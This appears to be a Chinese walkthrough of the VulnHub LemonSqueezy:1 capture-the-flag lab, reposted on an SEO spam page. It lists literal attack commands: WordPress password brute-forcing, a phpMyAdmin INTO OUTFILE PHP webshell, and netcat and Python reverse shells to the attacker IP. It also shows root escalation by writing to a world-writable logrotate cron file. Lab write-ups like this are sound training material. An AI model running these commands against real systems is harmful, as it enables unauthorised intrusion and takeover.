当前位置: 首页 > wzjs >正文

做微信扫码网站永久免费建站系统

做微信扫码网站,永久免费建站系统,信息流广告创意,手机网站 qq代码LemonSqueezy: 1 来自 <LemonSqueezy: 1 ~ VulnHub> 1&#xff0c;将两台虚拟机网络连接都改为NAT模式 2&#xff0c;攻击机上做namp局域网扫描发现靶机 nmap -sn 192.168.23.0/24 那么攻击机IP为192.168.23.182&#xff0c;靶场IP192.168.23.225 3&#xff0c;对靶机进…

LemonSqueezy: 1

来自 <LemonSqueezy: 1 ~ VulnHub>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182,靶场IP192.168.23.225

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.225

访问80端口开放的http服务

4,爆破枚举扫描网站存在的子目录

dirsearch -u http://192.168.23.225 -x 403,404

注意到/wordpress.tar.gz,访问一下下载这个压缩包

网站存在wordpress和phpmyadmin,非常经典的架构

5,使用wordpress的专属扫描工具

wpscan --url http://192.168.23.225/wordpress/ --api-token

wpscan --url http://192.168.23.225/wordpress/ -U orange -P /usr/share/wordlists/rockyou.txt --api-token 

orange/ginger尝试登录,然后又得到一个密码,应该是phpmyadmin的密码 n0t1n@w0rdl1st!

http://lemonsqueezy/wordpress/wp-admin/post.php?post=5&action=edit

6,尝试登录phpmyadmin

orange/n0t1n@w0rdl1st!

成功登录phpmyadmin,在phpmyadmin的SQL页面,输入以下命令:

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/wordpress/backdoor.php"

从而创建了backdoor.php文件访问该文件:

http://192.168.23.225/wordpress/backdoor.php?cmd=whoami

然后再编写payload getshell:

http://192.168.23.225/wordpress/backdoor.php?cmd=nc%20-e%20/bin/bash%20192.168.23.182%204444

访问这个URL,与此同时kali linux要打开对4444端口的监听

nc -lvvp 4444

7,使用python创建一个可交互shell

python -c 'import pty;pty.spawn("/bin/bash")'

8,信息收集查看定时任务

cat /etc/crontab

查看其中一个文件

cat /etc/logrotate.d/logrotate

这个文件能够执行系统命令,并且能够被所有用户读写执行

9,将python反弹shell的命令写入到/etc/logrotate.d/logrotate

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.23.182",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' >> /etc/logrotate.d/logrotate

与此同时kali 使用netcat打开对1234端口的监听

nc -lvvp 1234

成功提权成为root,并且get到flag

一、信息收集与初步探测

  1. 主机发现与端口扫描
  • 使用 netdiscover 扫描局域网内的活跃主机,确定靶机IP(如 10.1.1.14967
  • 通过 nmap 进行全端口扫描(nmap -sS -sV -p-),发现开放端口(如80/http、3306/mysql),识别服务版本(如Apache 2.4.25)67
  1. Web路径枚举与CMS识别
  • 使用 gobuster 或 dirsearch 扫描Web目录,发现 /wordpress/phpmyadmin 等敏感路径67
  • 通过 Wappalyzer 或手动分析页面特征,识别WordPress框架,并利用 wpscan 枚举用户(如 orange)及爆破密码(如 n0t1n@w0rdl1st!67
  1. 子域名与配置文件分析
  • 修改 /etc/hosts 文件解析域名(如 lemonsqueezy),解决页面加载异常问题6
  • 发现备份文件(如 backupPassword)或默认配置文件(如 settings.php),提取数据库凭证47

二、漏洞利用与初始访问

  1. SQL注入与WebShell写入
  • 通过phpMyAdmin登录后执行SQL语句,利用 SELECT ... INTO OUTFILE 写入WebShell(如 shell1.php),实现命令执行7
  • 触发反向Shell:通过WebShell执行 nc -e /bin/bash 或使用 Metasploit 的 wp_admin_shell_upload 模块获取低权限Shell(如 www-data47
  1. WordPress插件与主题漏洞
  • 利用后台编辑主题功能插入恶意PHP代码(如反弹Shell),或通过上传恶意插件获取控制权47
  1. 文件包含与命令注入
  • 发现存在文件包含漏洞的脚本(如 /Challenge/include.php),通过路径遍历读取敏感文件(如 /etc/passwd)或执行系统命令57

三、权限提升与横向移动

  1. 定时任务与Logrotate提权
  • 分析 /etc/crontab 发现以root权限执行的定时任务(如日志轮转),修改 /etc/logrotate.d/logrotate 文件插入提权命令(如复制SUID权限的Bash)7
  • 执行 chmod 4777 /var/www/html/wordpress/bash 后,通过 bash -p 获取root权限7
  1. SUID/SGID滥用
  • 使用 find / -perm -4000 2>/dev/null 查找具有SUID权限的可执行文件(如 findvim),通过参数注入或环境变量劫持提权24
  1. 敏感文件篡改
  • 发现全局可写的 /etc/shadow,直接替换root用户密码哈希(如使用 openssl passwd 生成新密码)37

http://www.dtcms.com/wzjs/140463.html

相关文章:

  • 宝安高端网站建设公司网络营销与直播电商专业
  • 网站首页滚动大图怎么做无锡百度推广公司哪家好
  • 做我男朋友好不好网站近期重大新闻事件10条
  • 四川城乡和住房建设厅官方网站seo营销培训
  • 网站建设后期服务收费标准优化设计高中
  • url就是网站的域名seo关键词分析
  • 闸北专业做网站营销型网站制作公司
  • 怎么在国税网站上做实名认证吗seo的方法
  • 简约风格网站设计百度人工客服电话多少
  • 网站建设 重点网络推广合同
  • 网站的建设多少钱seo报告
  • WordPress资讯站点源码关键词分为哪三类
  • 北京市网站建设公司怎么做电商创业
  • 手机网站大全网络营销培训班
  • 苏州网站建设制作推广赚钱的项目
  • 做印刷的网站有哪些网站搜索排名查询
  • 网络推广培训策划百度关键词seo年度费用
  • 哈尔滨模板网站媒体平台推广
  • 如何设计网站布局国内b2b十大平台排名
  • 智能网站建设维护软件网络推广网站
  • 医疗网站优化html网页制作成品
  • 如何做发卡网站seo的中文含义是什么
  • 网站推广的途径自己搭建网站需要什么
  • 导航类网站怎么做昆明seo工资
  • 游戏系统网站开发说明书百度竞价排名费用
  • 做图片网站会侵权吗海外市场推广方案
  • dw怎么做滚动视差的网站企业网站设计与实现论文
  • 做网站怎么选云主机自动app优化官网
  • 青县有做网站的吗做神马seo快速排名软件
  • 四川网站开发公司百度seo教程视频